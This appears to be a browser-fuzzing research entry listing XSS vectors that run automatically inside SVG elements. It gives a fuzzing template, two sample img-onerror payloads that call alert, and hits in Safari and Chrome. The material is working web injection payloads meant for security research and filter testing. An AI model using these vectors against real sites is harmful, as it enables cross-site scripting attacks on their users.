XSS vectors that execute automatically inside svg

This vector shows which events fire without user interaction inside an SVG tag.

Created by: hackvertor

Created on: Wednesday, April 17, 2024 at 6:20:49 PM

Updated on: Tuesday, December 3, 2024 at 12:30:12 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<svg><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>
<svg><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></svg>

Sample payloads

<svg><img src=1 srcdoc=1 href=1 href=1 onerror="alert('img->onerror')"></img></svg>
<svg><img onerror="alert('img->onerror')"></img></svg>

Fuzz results

Safari 17.4.1 Unknown Unknown
Updated: Wed Apr 17 2024
Found 1 result

Chrome 124.0.0.0 Unknown Unknown
Updated: Thu Apr 18 2024
Found 1 result